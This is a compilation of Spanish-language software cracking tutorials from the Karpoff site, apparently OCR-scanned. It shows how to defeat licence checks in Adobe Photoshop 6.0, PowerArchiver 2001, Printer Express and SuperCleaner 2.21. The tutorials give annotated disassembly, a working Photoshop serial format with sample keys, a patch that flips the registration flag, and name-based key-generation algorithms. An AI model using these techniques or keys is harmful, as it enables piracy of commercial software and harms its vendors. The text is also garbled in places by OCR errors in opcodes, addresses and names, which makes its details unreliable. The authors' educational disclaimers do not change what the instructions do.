ya he dicho antes, compara con otras claves ya transformadas. Cuando me di cuenta de esto, lo que hice fue 
crearme un programilla que me volviera a transformar dichas claves que habia en memoria para poder 
copiarlas y comprobar que eran las correctas. Pero cual fue mi sorpresa, cuando observé que ninguno de 
esos seriales eran válidos, y entonces ¿por qué mierda comparaba mi clave con esos seriales si al final 
ninguno valía?, esto es un ejemplo de clave que utilizaba para comparar y que transformé: 
PWW250R3000406-282, claramente tiene to la pinta de número de serie, ¿verdad?, bueno, pués como 
esta había 20 o 30 claves más, y ninguna valía. La explicación de esto no la tengo clara, si alguien me lo 
puede decir... Nada, no había nada que hacer con esto, tendría que seguir traceando, a ver si encontraba de 
nuevo alguna pista, pero esta vez sin trampas. 


Encontré dos cosas que me llamaron la atención: Una de ellas es que comprobaba si mi serial comenzaba 
por los dos caracteres PW: 


:1000198D OFBFC1 movsx eax, cx 

:10001990 8A54041C mov dl, byte ptr [esp+eax+1C] <-----esp+1c apunta a mi serial 
:10001994 8A1C30 mov bl, byte ptr [eax+esi] <-----esi apunta a "PW" 

:10001997 3AD3 cmp dl, bl 

:10001999 7527 ¡ne 100019C2 

:1000199B 41 inc ecx 

:1000199C 6683F902 cmp cx, 0002 <-----Compara únicamente dos caracteres 
:100019A0 7CEB jl 1000198D 

:100019A2 EB04 jmp 10001948 


, y otra es que el cuarto caracter, empezando por el final, fuera un guión (-): 


:100019DB 8A441C1C mov al, byte ptr [esp+ebx+1C] <-----al = cuarto caracter empezando por el final 


|:100019DF 8D7C1CIC lea edi, dword ptr [esp+ebx+1C] 
:100019E3 3C2D cmp al, 2D <-----Aquí tenemos la comparación (2D es el guión en ascii) 
:100019E5 0OF853B030000 ¡ne 10001D26 


Estas dos pistas junto con las claves fantasmas que vimos anteriormente, me hicieron suponer que 
realmente el serial correcto tendría la pinta que tenían dichas claves fantasmas, es decir, PW............ _.. 
También observé que los últimos tres caracteres debían de ser números. Esto lo hacía de una forma un tanto 
extraña, pero no lo pondré para no liaros más (además era bastante código), sólo deciros que utilizaba los 
codigos ascii de los caracteres como base de una dirección la cual devolvía un valor, concretamente el 84 si 
era número y un 1 si era letra, que al aplicarle un AND valor,4 daba resultados diferentes. 


Lo que sigue a continuación son dos llamadas claves que operan con el número de serie. La primera no me 
costó demasiado trabajo darme cuenta que lo que hacía era devolver el valor del número compuesto por las 
tres últimas cifras pero transformada a hexadecimal (monta una impresionante sólo para hacer esta 
tontería). La segunda es un tanto más complicada, pués, realizan diversas operaciones matemáticas, luego 
usa los resultados parciales para, utilizándolos como base, acceder a zonas de memoria donde se encuentran 
una serie de valores, los cuales a su vez son utilizados para operar con el número de serie. La verdad, algo 
bastante complicado de seguir: 


:10001446 52 push edx <-----Dirección donde se encuentran los tres últimos dígitos (número en decimal) 
:10001AA7 E891200000 call 10003B3D <-----Transforma a hexadecimal 

:10001AAC 8BFO mov esi, eax <-----Devuelve el valor en hexadecimal y lo copia a esi 

:10001AAE 8D442420 lea eax, dword ptr [esp+20] 

:10001AB2 53 push ebx <-----Longitud = n2 caracteres serial - 4 (o sea, hasta el guión) 

:10001AB3 50 push eax <-----Dirección donde se encuentra el serial 

:10001AB4 895C2424 mov dword ptr [esp+24], ebx 

:10001AB8 E8D3F9FFFF call 10001490 <-----No tengo muy claro como trabaja exactamente (es complicado) 
:10001ABD OFBFC8 movsx ecx, ax <-----Valor devuelto de la llamada se pasa a ecx 

:10001ACO 83C40C add esp, OODOOOOC 

:10001AC3 3BCE cmp ecx, esi <-----comparamos y.. 

:10001AC5 OF855B020000 ¡ne 10001D26 <-----Si todo va bién, continua, sino, salta a tomar por culo 
:10001ACB 83FB07 cmp ebx, 00000007 <-----está mirando si hay un mínimo de 7 caracteres antes del guión 
:10001ACE 896C2410 mov dword ptr [esp+10], ebp <-----En principio está metiendo un 1 

:10001AD2 C60700 mov byte ptr [edi], 00 <-----quita el 2D (guión) y lo pone a 00 

:10001AD5 66892D308F0010 mov word ptr [10008F30], bp 

:10001ADC 7COC jl 100O1AEA <-----A tomar por culo si hay menos de 7 caracteres antes del guión 
:10001ADE 84442422 mov al, byte ptr [esp+22] <-----al = 72 caracter, ¿para que? 

:10001AE2 3C41 cmp al, 41 <-----comprueba si es mayor de A 

:10001AE4 7C04 jl 1OOO1AEA <-----Si no es así a tomar viento 

:10001AE6 3C5A cmp al, 5A <-----¿Menor o igual que Z? 

:10001AE8 7E08 jle 10001AF2 <-----salta si es así 


Veamos que podemos sacar de este trozo de código: lo primero de todo, fijaos en lo último, está 
comprobando que el caracter que ocupa la posición 7 ha de ser una letra en mayúsculas, curioso, ¿verdad?. 
Por los dos primeros CALL“s podemos saber que tres últimos dígitos poner después del guión, y es el 
resultado en decimal del valor devuelto por CALL 10001490, por ejemplo: para PW123 se devuelve 2B2, por 
lo tanto si ese es el valor que queremos que devuelva CALL 10003B3D, hemos de poner 690 que equivale a 
2B2 en decimal. Uniendo estas dos cosas obtendríamos algo como esto: PW1234A-351, pero esto sigue 
sin funcionar, falta algo más. Sigamos traceando, ya casi lo tenemos: 


p* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10001C8C(U) 


| 
:10001C96 83C3FA add ebx, FFFFFFFA <-----ebx = n2 caracteres hasta el guión - 6, en mi caso ebx = 7 - 6 =1 
:10001C99 8D4C241C lea ecx, dword ptr [esp+1C] 


:10001C9D 53 push ebx 

:10001C9E 6A00 push 00000000 

:10001CAO 51 push ecx <-----dirección del serial sólo hasta el guión 

:10001CA1 E84AF8FFFF call 100014FO <-----devuelve los 6 caracteres antes del guión, en mi caso: W1234A 
:10001CA6 83C40C add esp, OODODOOC 

:10001CA9 EB07 ¡mp 10001CB2 


* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
|:10001CC1(C) 


| 

:10001D14 8D44241C lea eax, dword ptr [esp+1C] 

:10001D18 50 push eax <-----manda los 6 caracteres antes del guión 

:10001D19 ES81F1E0000 call 10003B3D <-----comprueba si todos los caracteres son números 
:10001D1E 83C404 add esp, 00000004 

:10001D21 A3348F0010 mov dword ptr [10008F34], eax 


* Referenced by a (U)nconditional or (C)onditional | ump at Addresses: 
|:10001889(C), :10001892(C), : 100019D5(C), :100019E5(C), : 10001A36(C) 
|: 10001A69(C), :10001A9C(C), : 10001AC5(C) 


| 
:10001D26 8B442410 mov eax, dword ptr [esp+10] <-----1 -> correcto , O -> no es correcto 


Fijaos este código, digamos que sólo coge los 6 caracteres que hay antes del guión y comprueba que sólo 
sean números, por lo tanto, podríamos probar con esta otra clave a ver si funciona: PW1234A123456- 
345 


Programa de instalación de Adobe Photoshop 6.0 


¡¡¡ Prueba superadaaaaaa !!!, fijaos que sencillo, ahora podemos sacar todas las claves que nos de la gana, 
eceptuando las que sean iguales a las claves fantasmas que ya vimos. El formato que sigue es el siguiente: 
PWecccLdddddd-nnn, siendo PW obligatorio ponerlo, las cs significan cualquier caracter ya sea letra o 
número, la L ha de ser una letra (en mayúscula), las ds sólo dígitos y las n's se sacan a partir de la función 
CALL 10001490 que operaba con los caracteres que había antes del guión devolviendo así un valor 
hexadecimal y que es esas n's pero en decimal. Un ejemplo de varias claves: PW1111P111111-129, 
PW3984D108379-969, PVWNOO0(G555555-218, PWHOLAT223344-906, etc... Creo que ya se ha 
entendido, ¿no?, pues ala, ya esta todo dicho. 


NOTAS FINALES 


Sólo quería decir una cosa: en la introducción dije que todo esto se solucionaba con un simple cambio de 
flag en memoria. Vereis, mientras estudiaba este código, observé que todo esto estaba dentro de una 
llamada que siempre devolvía un valor en eax, concretamente un 0, siempre, y luego metía este resultado en 
una zona de memoria. Observad: 


[:0042A3FE FF95AOFBFFFF call dword ptr [ebp+FFFFFBAO] <-----Aquí tenemos, digamos, la llamada padre 


[:0042A404 898570FBFFFF mov dword ptr [ebp+FFFFFB70], eax <-----eax = 1 -> clave correcta, eax = 0 -> mal 
[:0042A40A EB78 ¡mp 00424484 


Luego, todo lo que os he contado se puede resumir en un simple cambio de bit, es decir, con sólo cambiar 
de O a 1 el valor que se devuelve en eax registramos correctamente el programa (digamos que cambiamos el 
flag en la dirección ebp+FFFFFB70), aunque la clave no sea la correcta, jeje, pero como comprendereis 
hubiera sido un tuto muy aburrido si sólo os hubiera contado esto, ¿verdad?, además, ya lo he dicho otras 
veces, el cracking es un arte y como tal no hay que dejarlo en un simple cambio. 


AVISO 


| No me hago responsable del uso indebido o ilegal que cualquier persona haga de este tutorial. El estudio de 
la ingeniería inversa, en mi opinión, debería de hacerse con fines didácticos y no para beneficio de ella en 
| cuanto a la desprotección de software y por consiguiente su uso ilegal. Si consideras que un programa, por 
su Calidad, merece ser comprado al precio estipulado, hazlo, los programadores de dicho software lo 
merecen, sino desinstalalo. Si realmente te apasiona el mundo de la ingeniería inversa, dedícalo sólo para tu 
aprendizage y diversión personal. 


¡Si piensas que estos tutoriales no deberían de publicarse, considero que estás muy equivocado, pués alguien 
| " " 2 
debe de mostrar a los programadores encargados de proteger las aplicaciones donde están sus fallos de 
protección, para que lo corrijan y mejoren. 


DEDICATORIA 
Quiero dedicar este tutorial a mis colegas de facultad: Rafa, Migue, Jose miguel, Manolo. A mis amigos del 


| Instituto: Reyes, Rincón, Jeremy, Dani, Marchena, Fernando, Santi... bueno, en general, a los que aguantan 
todos los días mis tonterías. 


A todo a los cracker que escriben para la página de Karpoff, y por supuesto al propio Karpoff, los cuales me 
guían en este duro camino de la ingeniería inversa. 


Nota2: Perdonad mis faltas de ortografía, soy un inculto de cojones, xDDD 


CORREO DEL MENDA: auspextAwanadoo.es 


[Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


MO] Power Archiver 2001 v7.02.08 


Descripción: Compresor y descompresor de muy buenas prestación y con soporte para más de 18 formatos 
Dificultad: Novato 

DOWNLOAD: http: //download. powerarchiver. con/powarc70208.exe 

Herramientas: Softice,W32DASM 


CRACKER: LeafaR GV FECHA: 30/09/2001 
INTRODUCCION 


Este tutorial es para novatos como yo... 

Y lo único que intento hacer es compartir y demostrar que algo he aprendido leyendo los buenos tutos, 
manuales y demas'es que he encontrado por la red y más específicamente en la pagina de Karpoff. 

Aquí analizaremos un excelente programa con el fin único de extraer un serial valido con el softice... el 
win32dASM solo lo uso para seguir el código y mostrarlo en este tuto... 


LeafaR GV aprendiz de Crack and Student of Chemical Engineering 


AL ATAKE 


Yap!!!!.... Lo primero. 
Lo de siempre revisar el archivo, su directorio, el registro. Después de todo el análisis previo no aparece nada muy 
raro excepto que esta escrito en Delphi 3.0 ((( cosa rara ?¿))). 


Vamos al Simbol Loader del SICE y cargamos el "Powerarc.exe", le damos a las rueditas dentadas (((engranajes))) y 
salta el SICE, con un F5 se abre al programa y nos aparece un bello icono que dice "register" .... Ingresamos nuestro 
datos 


Name ::::  LeafaR GV 
Serial :::: 6204076 


Con CTR-D ingresamos al SICE y ponemos el Clásico """" bpx hmemcpy """ con F5 regresamos al programa y le 
damos al botón"OK""..... Y salta el SICE, nos esta leyendo el nombre por tanto con FS saltamos al siguiente break point 
que es otro hmemcp y aquí se lee el serial 6204076. 


Ahora con unos F10 aparecemos en en POWERARC!CODE+00039190 muy cerca de un retorno de función "RET" 
antecedido por unos comandos "POP" (((Saca datos de la pila))), pero lo que nosotros buscamos es una comparación 
seguido de un salto condicional o algo parecido... 

Por tanto seguimos con FT0 hasta el final del "RET" y caemos en otro "RET" seguimos ... Ups!!! otro "RET" 
seguimos ... Yaaa!!! otro "RET" .... Adivina !! sip, otro "RET". XD XD XD XD 


Uff !!! por fin un pedazo de código ::: 


:00559748 A1047A5FOO mov eax, dword ptr 
:005597AD S03: camp byte ptr [eax], 
je 005597E9 


mov edx, dword ptr [ebp-03] 
v eax, dword ptr [ebp-04] 
D05596F8 


ES 


Tenemos una "Call", aquí es donde se genere el Serial Correcto luego esto activa o desactiva el flag (((AL))) en caso 
que nuestro serial este malo o bueno. Como era lógico entre a la "CALL" con F8 y me encontré con una mazamorra de 
llamadas y saltos que me fue imposible tracear correctamente (((( Recuerda que soy un novato ))).... 

Luego salí Y un poco más abajo me salto la ventana de error. Esa ventana de error salió mucho más atrás de la 
dirección de memoria 00559874 ***, por tanto si realizamos el salto nos evitamos la ventana de error. 

Esto comprueba las sospechas sobre el salto y la CALL teoría anterior. 


Bueno comprobamos la teoría pero aun no tenemos nuestro serial... Para solucionar este problema usamos una técnica 
un poco bruta pero que a veces funciona . Justo al llegar a la dirección de Memoria donde esta nuestra "CALL" nos 
fijamos en los registros que cambian al pasar por ella... 

La pregunta lógica sería, como se cuales registros cambian ?¿ la respuesta es simple, la ventana de registro del SICE te 
indica cuales cambian, register window (((La habilitas con el comando ""wr""))) 


Los registros que cambian de valor al pasar por la "CALL" son EAX, ECX, EDX, EIP 
EAX , es decir, que estos registros fuero usados por la rutina generadora del serial, por tanto los revisamos para ver que 
nos pueden entregar. 


: d ecx Nada útil o sospechoso 


:? ecx 25853956 


: d edx LeafaR GV._.X._. 


Ese si que tiene pinta de Serial .... Lo probamos y. 


PowerArchiver ES 


( 3 ) Registration accepted! Thank you for purchasing Powerárchiver. 


Eso seria Todo por Hoy.... 
Lo de Siempre, cualquier error o duda sobre el tuto simplemente envía un e-mail a LeafaRGV Chotmail.com . ((lo 
otro )) este tuto es solo con fines educativos y bla bla .-. 


Bueno ya pa' terminar si buscas un buen descompresor y compresor de archivos te recomiendo FilZip 2.01 soporta más 
de 14 formatos y esta bien bueno.... 


Un Saludo Y GRax A todos Los Crack ..... 
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Karpoff Spanish Tutor 1999-2002 


Printer Express v1.0 


Name / Serial 
Hacer un Keygen 


PrinterExpress es un programa muy útil para todo aquel que trabaja con diferentes 
impresoras en una red. 


Novato. 


http://www. SouthByPC.com 


TRW2000, W32dasm 


ByTESCRK FECHA: 26/11/2001 


INTRODUCCION 


Bueno, pues aquí estamos nuevamente para ver una protección más esta básicamente es la misma 
que tiene el SuperCleaner y algunos otros productos de esta empresa, algunos que hasta hace algún 
tiempo habian sido gratuitos, ahora ya van desde los $8 a los 20$. 


Bueno así pudieramos seguir hablando de muchas cosas sobre los productos que realmente esta 
introducción se haría bastante larga, lo importante del caso es que... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas 
de manera educacional y tambien como diversión, si te gusta, este producto por favor 
COMPRALO, algunas veces... los autores merecen su dinero ;o)" 


AL ATAKE 


Carguemos el programa y hacemos clic en Enter Code... sale otra ventana y nos dice que ingresemos nuestro 
nombre y el código, en mi caso los de siempre, hacemos clic en OK y el error 


Incorrect registration code! 


Abrimos el W32DASM y vamos a buscar esto en las cadenas de referencia luego de desensamblar el 
programa y encontramos esto al hacer doble clic en la cadena... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00402B1F(C) <= Investigaremos por aqui 


| 
:00402B71 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"PrinterExpress" 


| 
:00402B73 6870904000 push 00409070 


* Possible StringData Ref from Data Obj ->"Incorrect registration code!" 


| 
:00402B78 6840924000 push 004092A0 <= Aquí caemos 
:00402B7D 56 push esi 


* Reference To: USER32.MessageBoxA, Ord:01C3h 

| 

:00402B7E FF15A8714000 Call dword ptr [004071A8] 

* Possible Reference to String Resource ID=00001: "Registered to " 


| 

:00402B84 B801000000 mov eax, 00000001 
:00402B89 5E pop esi 

:00402B8A 810400020000 add esp, 00000200 
:00402B90 C21000 ret 0010 


Al ir a 00402B1F nos encontramos con esto... 


:00402B12 50 push eax 

:00402B13 51 push ecx 

:00402B14 E867020000 call 00402D80 <= Aqui se genera y compara el serial 
:00402B19 83C408 add esp, 00000008 

:00402B1C 85C0 test eax, eax 

:00402B1E 5F pop edi 

:00402B1F 7450 je 00402B71 <= Aqui llegamos 

:00402B21 8D542404 lea edx, dword ptr [esp+04] 


Abrimos TRW y ponemos un punto de ruptura en 00402B14, luego de que hayamos ingresado nuestros datos 
hacemos clic en OK y automáticamente salta el TRW y llegamos aqui. 


:00402D80 81EC00010000 sub esp, 00000100 

:00402D86 A070B74000 mov al, byte ptr [0040B770] 
:00402D8B 56 push esi 

:00402D8C 57 push edi 

:00402D8D 88442408 mov byte ptr [esp+08]1, al 
:00402D91 B93F000000 mov ecx, 0000003F 

:00402D96 33C0 xor eax, eax 

:00402D98 8D7C2409 lea edi, dword ptr [esp+09] 
:00402D9C 8B94240C010000 mov edx, dword ptr [esp+0000010C] 
:00402DA3 F3 repz 

:00402DA4 AB stosd 

:00402DA5 66AB stosw 

:00402DA7 8D4C2408 lea ecx, dword ptr [esp+08] 
:00402DAB 51 push ecx 

:00402DAC 52 push edx 

:00402DAD AA stosb 

:00402DAE E83D010000 call 00402EFO <= Entramos aquí 
:00402DB3 8BB42418010000 mov esi, dword ptr [esp+00000118] 
:00402DBA 56 push esi 

:00402DBB E890000000 call 00402E50 

:00402DC0 8D442414 lea eax, dword ptr [esp+14] 


Al entrar en la rutina vemos esto... 


:00402EFO 81£C00010000 sub esp, 00000100 
:00402EF6 A070B74000 mov al, byte ptr [0040B770] 
:00402EFB 53 push ebx 

:00402EFC 55 push ebp 


:00402F1A 57 push edi 

:00402F1B FF15CC704000 Call dword ptr [004070CC] <= Cuenta el tamaño del nombre 
:00402F21 8BFO mov esi, eax 

:00402F23 33C9 xor ecx, ecx 

:00402F25 33C0 xor eax, eax 

:00402F27 85F6 test esi, esi 

:00402F29 7E13 jle 00402F3E 

:00402F2B 8B1590924000 mov edx, dword ptr [00409290] <= Asigna el valor de 18h a EDX 
:00402F31 OFBE1C38 movsx ebx, byte ptr [eax+edi] <= Extrae letra por letra 

:00402F35 03DA add ebx, edx <= EBX = EBX + EDX 

:00402F37 03CB add ecx, ebx <= ECX = ECX + EBX 

:00402F39 40 inc eax <= Incrementa EAX en 1 

:00402F3A 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402F3C 7CF3 jl 00402F31 <= Si no regresa a 00402F31 

:00402F3E 8B9C2418010000 mov ebx, dword ptr [esp+00000118] 

:00402F45 51 push ecx <= ECX a memoria 

:00402F46 68D4924000 push 004092D4 

:00402F4B 53 push ebx 

:00402F4C FF151C714000 Call dword ptr [0040711C] <= Se agrega un guión al valor ECX en dec ej. NNN- 
:00402F52 83C40C add esp, 0000000C 

:00402F55 33C9 xor ecx, ecx 

:00402F57 33C0 xor eax, eax 

:00402F59 85F6 test esi, esi 

:00402F5B 7E14 jle 00402F71 

:00402F5D 8B1594924000 mov edx, dword ptr [00409294] <= Se le asigna el valor de 27h a EDX 
:00402F63 OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402F67 OFAFEA imul ebp, edx <= EBP = EBP * EDX 

:00402F6A 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402F6C 40 inc eax <= Incrementa EAX en 1 

:00402F6D 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402F6F 7CF2 jl 0O402F63 <= Si no regresa a 00402F63 

:00402F71 51 push ecx 

:00402F72 8D4C2414 lea ecx, dword ptr [esp+14] 

:00402F76 68D4924000 push 004092D4 

:00402F7B 51 push ecx 

:00402F7C FF151C714000 Call dword ptr [0040711C] <= Se agrega un guión al valor ECX en dec 25233- 
:00402F82 83C40C add esp, 0000000C 

:00402F85 8D542410 lea edx, dword ptr [esp+10] <= Valor de ECX más el guión (25233-) 
:00402F89 52 push edx 

:00402F8A 53 push ebx 

:00402F8B FF15D0704000 Call dword ptr [004070D0] <= Se concatenan los valores NNN-25233- 
:00402F91 33C9 xor ecx, ecx 

:00402F93 33C0 xor eax, eax 

:00402F95 85F6 test esi, esi 

:00402F97 7E13 jle 00402FAC 

:00402F99 8B1598924000 mov edx, dword ptr [00409298] <= Se le asigna el valor de 1Ah a EDX 
:00402F9F OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402FA3 03EA add ebp, edx <= EBP = EBP + EDX 

:00402FA5 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402FA7 40 inc eax <= Incrementa EAX en 1 

:00402FA8 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402FAA 7CF3 jl 00402F9F <= Si no regresa a 00402F9F 

:00402FAC 51 push ecx 

:00402FAD 8D442414 lea eax, dword ptr [esp+14] 

:00402FB1 68D4924000 push 004092D4 

:00402FB6 50 push eax 

:00402FB7 FF151C714000 Call dword ptr [0040711C] <= Se agrega guión al valor de ECX en decimal 
:00402FBD 83C40C add esp, 0000000C 

:00402FCO 8D4C2410 lea ecx, dword ptr [esp+10] 

:00402FC4 51 push ecx 

:00402FC5 53 push ebx 


:00402FC6 FF15D0704000 Call dword ptr [004070D0] <= Se unen los valores NNN-25233-855- 
:00402FCC 33C9 xor ecx, ecx 

:00402FCE 33C0 xor eax, eax 

:00402FDO 85F6 test esi, esi 

:00402FD2 7E14 jle 00402FE8 

:00402FD4 8B159C924000 mov edx, dword ptr [0040929C] <= Se le asigna el valor de 01h a EDX 
:00402FDA OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402FDE OFAFEA imul ebp, edx <= EBP = EBP * EDX 

:00402FE1 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402FE3 40 inc eax <= Incrementa EAX en 1 

:00402FE4 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402FE6 7CF2 jl 0O402FDA <= Si no regresa a 00402FDA 

:00402FE8 51 push ecx 

:00402FE9 8D542414 lea edx, dword ptr [esp+14] 

:00402FED 68D0924000 push 004092DO 

:00402FF2 52 push edx 

:00402FF3 FF151C714000 Call dword ptr [0040711C] <= Se transforma el valor a decimal 
:00402FF9 83C40C add esp, 0000000C 

:00402FFC 8D442410 lea eax, dword ptr [esp+10] 

:00403000 50 push eax 

:00403001 53 push ebx 

:00403002 FF15D0704000 Call dword ptr [004070D0] <= Se unen los valores NNN-25233-855-647 
:00403008 5F pop edi 

:00403009 5E pop esi 

:0040300A 5D pop ebp 

:0040300B 5B pop ebx 

:0040300C 81C400010000 add esp, 00000100 

:00403012 C3 ret 


Eso es todo, ahora puedes disfrutar del programa sin molestos recordatorios, tan solo este que te doy... 
"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si te gusta, este producto por favor COMPRALO, 
algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, 
en especial a ti por que has llegado hasta una vez más hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 
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File Inspector , Softl ce 
OGZRIP FECHA: 01/04/2002 


INTRODUCCION 


NOTA: Lo que aquí se expresa es sólo con fines educativos. El divulgar conocimientos no puede 
hacerme responsable del uso que se le quiera dar a este material. Así que disfrutalo , destripalo y 
finalmente , compraló ( si puedes ). 


Hola amigos!! esta vez se trata de como muy bien indica su nombre de un programa para borrar 
ficheros indeseados llamado SuperCleaner v 2.21. Es bastante configurable permitiendonos además 
eliminar las molestas "cookies" dejadas siempre por | nternet. 


AL ATAKE 


Vamos como siempre a utilizar el File Inspector para saber con que nos enfrentamos. 


gu file insPE ctor XL al ES 


Pa Modificar ú Herramientas | 27 Plug-Ins | <A Procesos | he] Acerca de... | 
E cabezerape | [5%] cabezeramz |] (secciones | +9 Funciones (8 Compilador 


Compilador /Compresor/Protector 


Microsoft Visual C++ 6.0 

Signatura; < 55 88 EC 64 FF 68 EO 94 41 00 68 FO 45 41 0064 41 
00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 CodeDaemon 
89 65 ES FF 1560 91 41 00 33 > 


B Info... 


J” Permitir análisis heurístico 


Versión del SO; 0] Versión de la imágen: fo.o 
Versión del enlazador: [6.0 Versión del subsistema: [4.0 


[ms] [2 Abrir archivo + Lo Analizar p Salir 
C:¡APrueba'SuperCleanerSuperCleaner.exe | 0,27 secs. 


Está hecho con Microsoft Visual C++ 6.0. Ahora vamos a la pestaña Secciones para saber si tiene algún tipo de 
protección anti - Desensamblado 


4d file insPE ctor XL Ta ES 


ES Modificar | Uf Herramientas | 2 Plug-Ins | <> Procesos | 10 acerca de... | 
dE Cabezera PE | [5] Cabezera M2 L*] Secciones | :S Funciones | e Compilador | 


Mame | Virtual Address | Virtual Size | Phisic Address | Phisic Size | Characteristics 


L£] text 00001000 00017FCC 00001000 00015000 60000020 
(3 .rdata 00019000 DODO1FEE 00019000 00002000 40000040 
(O data 00016000 0000667C 00016000 00005000 C0000040 
A rsre 00022000 00036008 00020000 00037000 40000040 


¡ e MEA de 
[pe Sections +] 8 Alinear sección 4 Yolcar sección 2 Añadir Sección 


0 [3 Abrir archivo y 3 Analizar p Salir 
CAPruebaSuperCleanerSuperCleaner. exe 0,27 secs. 


Como veis no tiene nada que nos impida su desensamblado o el trabajar con el Softl ce así que le vamos a 
arrancar para ver que nos cuenta : 


You may use this trial version free for 30 days. After the 30 day trial period is over, 
certain features will be disabled. If you wish to continue using SuperCleaner after 
the trial period has ended, click on the "Purchasing Info" button below. 


LN What You Get When You Order 


You will receive a code that will unlock SuperCleaner, and activate all of its features 
The code will be sent to you via e-mail, immediately following your purchase 


Future versions and upgrades to this product are free to registered users 
Secure Ordering 


All purchases made online use the latest encryption technology, 
so your credit card information is kept safe and protected 


Puctasg o 


Vamos a intentar registrarnos para lo cual picamos sobre el botón Enter Registration con lo que nos aparece la 
típica ventana de registro : 


If you paid the registration fee and have received a registration 
code, enter the name and code in the spaces provided exactly as 
they appear in the registration information that was sent to you. 


Name: [26ZRiP 
Code [1234567890 


Concal_| 


Pulsamos sobre el boton Ok e inmediatamente nos comunica que como siempre nos hemos equivocado al 
meter nuestros datos 


SuperCleaner EZ 


Sorry, you have entered an incorrect registration code. 


Carguemos el programa con el Loader del Softl ce y pongamos los Breakpoints pertinentes , yo suelo poner : " 
GetDlgltemTexta , MessageBoxA y GetWindowTexta " pero aunque caemos en Softl ce con GetDlgl temTexta 
empiezo a dar vueltas y nos consigo mucho así que utilizaré el que casi nunca falla " Hmemcpy " Cuando salte 
al Softl ce damos una vez en F5 para saltar el nombre y a continuación damos F12 todas las veces necesarias 
hasta llegar al cuerpo del programa cosa que ya nos indica el mismo Softl ce cuando en la parte inferior de la 
ventana de desensamblado aparece algo como SUPERCLEANER!.Text + AD17 . 


0040BD19 . 8D84240801000 LEA EAX,DWORD PTR SS:[ESP+108] <---- Caemos aquí (Nuestro número) 


0040BD20 . 8D4C2408 LEA ECX,DWORD PTR SS:[ESP+-8] <---- Nuestro nombre 
0040BD24 . 50 PUSH EAX 
0040BD25 . 51 PUSH ECX 


0040BD26 . E345080000 CALL 00400570 


Como veis carga en los registros EAX y ECX nuestro número y nuestro nombre respectivamente , a 
continuación los guarda en la pila y hace una llamada. Vamos, lo típico en una rutina de generación de un 
número , asi que vamos a entrar en dicha llamada con F8: 


0040C570 .81EC00010000 SUB ESP,100 
0040C576 .A074F14100 MOV AL,BYTE PTR DS:[41F174] 


0040C57B .57 PUSH EDI 

0040C57C .88442404 MOV BYTE PTR SS:[ESP+4],AL 
0040C580 .B93F000000 MOV ECX,3F 

0040C585 .33C0 XOR EAX,EAX 

0040C587 .8D7C2405 LEA EDI,DWORD PTR SS:[ESP+5] 
0040C58B .F3AB REP STOS DWORD PTR ES:[EDI] 
0040C58D .8B942408010000 MOV EDX,DWORD PTR SS:[ESP+108] 
0040C594 .8D4C240 LEA ECX,DWORD PTR SS:[ESP+4] 
0040C598 .66AB STOS WORD PTR ES:[EDI] 

0040C59A .51 PUSH ECX 

0040C59B .52 PUSH EDX 

0040C59C .AA STOS BYTE PTR ES:[EDI ] 

0040C59D .E8AE000000 CALL 0040C650 <---- Rutina que genera número de serie 
0040C5A2 .8B8C241401000 MOV ECX,DWORD PTR SS:[ESP+114] 
0040C5A9 .83C408 ADD ESP,8 

0040C5AC .8D442404 LEA EAX,DWORD PTR SS:[ESP+4] 
0040C5B0 .50 PUSH EAX 

0040C5B1 .51 PUSH ECX 

0040C5B2 .FF15F8914100 CALL DWORD PTR DS:[] 

0040C5B8 .F7D8 NEG EAX 

0040C5BA .1BCO SBB EAX,EAX 

0040C5BC .5F POP EDI 

0040C5BD .40 INC EAX 

0040C5BE .81C400010000 ADD ESP,100 

0040C5C4 .C3 RET 


Después de ejecutar con F10 la rutina que genera el dichoso numerito vemos que ha variado el registro EAX 
por lo que haciendo un sencillo D EAX obtenemos el número de serie válido para el correspondiente nombre 
que yo he metido. En este caso 720-xxxxxX-yyy-ZZZZ. 

¿ Porqué digo esto ? es facil averiguar que lo genera siempre en función del nombre que se introduce , ¿ 
como? pues entrando en dicha rutina y trabajando en ella . 


Primera parte del número : 


Nombre ASCII Operación Número "X" Parcial Total 


O 64 + 38 102 102 
G 71 + 38 109 211 
Z 80 + 38 118 329 
R 82 + 38 120 449 
1 105 + 38 143 592 
Z 90 + 38 128 720 


Como veis ya hemos descubierto de donde saca la primera parte del número. Coge el valor ASCII de cada uno 
de los caracteres introducidos como nombre ( espacios incluidos ) los va sumando uno a uno a un número que 
en esta tabla yo he llamado Número "X" que es dado por el programa ( 38 en este caso ) y luego va sumando 
los distintos resultados. 

Aún nos quedaría por encontrar las otras 3 partes del número de série válido , pero eso ya lo dejo para que lo 
hagais vosotros , os aseguro que es bastante facil el ver como lo hace solamente teneis que ir siguiendo el 
código . 

Bueno pues vamos a meter el número encontrado para ver si efectivamente nos registra , como veis no nos 
dice en absoluto si hemos acertado o fallado , pero si cerrais el programa y volveis a arrancarlo ya no saca la 
primera pantalla donde nos pedia registrarnos y nos decia cuantos dias de prueba quedaban . 

Por último solo nos queda ver en donde guarda dicho registro , lo localizamos en : 


